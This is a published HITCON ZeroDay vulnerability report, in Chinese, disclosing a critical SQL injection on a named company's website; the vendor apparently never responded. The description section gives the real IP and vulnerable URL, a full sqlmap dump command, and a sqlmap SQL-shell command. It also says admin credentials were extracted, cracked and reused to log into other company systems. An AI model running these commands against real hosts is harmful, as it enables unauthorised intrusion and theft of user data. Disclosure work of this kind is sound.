Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2022-00651
- 發信 Vendor: 某機電公司
- Title: 國霖機電管理服務股份有限公司網站存在資料庫注入漏洞
- Introduction: SQL injection
處理狀態
目前狀態
公開
Last Update : 2022/10/14
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2022/08/14 17:45:27 : 新提交 (由 #! 更新此狀態)
- 2022/08/14 17:49:06 : 新提交 (由 #! 更新此狀態)
- 2022/08/14 18:18:03 : 新提交 (由 #! 更新此狀態)
- 2022/08/14 18:35:59 : 新提交 (由 #! 更新此狀態)
- 2022/08/14 18:36:56 : 新提交 (由 #! 更新此狀態)
- 2022/08/14 19:43:23 : 新提交 (由 #! 更新此狀態)
- 2022/08/14 19:44:49 : 新提交 (由 #! 更新此狀態)
- 2022/08/15 14:12:35 : 新提交 (由 #! 更新此狀態)
- 2022/08/15 21:44:13 : 新提交 (由 #! 更新此狀態)
- 2022/08/16 01:14:46 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/31 18:12:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/31 18:12:00 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/08/31 18:12:00 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2022/10/14 03:00:04 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2022-00651
- 通報者:summer83583 (#!)
- 風險:嚴重
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://211.23.225.235/news.php?page=2
http://211.23.225.235/going_tel/index.php
http://km.goingnet.com.tw/index/login?next=%2F
https://my.homeblog.com.tw/
http://211.23.225.235/going_tel/index.php
http://km.goingnet.com.tw/index/login?next=%2F
https://my.homeblog.com.tw/
敘述
經使用SQLmap檢測工具發現 http://211.23.225.235/news.php?page=2 存在著 盲SQL注入以及UNION 攻擊 POST 參數 QaClass1
sqlmap -u "http://211.23.225.235/news.php?page=2" -D goingnet_tel_db --dump --forms --crawl=2 --random-agent -dbms=mysql --batch --tamper=space2comment
資料庫為goingnet_tel_db 資料表 user_table1 兩位管理者帳號以及密碼
嘗試登入員工入口網 http://211.23.225.235/going_tel/index.php
可利用SQLmap 解密 資料庫 hash 獲得帳號以密碼 sqlmap -d "MySQL://hsucc:[email protected]:3306/goingnet" --sql-shell 進行 MySQL Commands
獲得我家部落格社區e化服務平台帳號密碼 http://km.goingnet.com.tw/index/login?next=%2F
經驗證可登入 管理者使用弱密碼沒多因子認證防護機制
並發現可登入KM知識管理系統 http://km.goingnet.com.tw/index/login?next=%2F
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。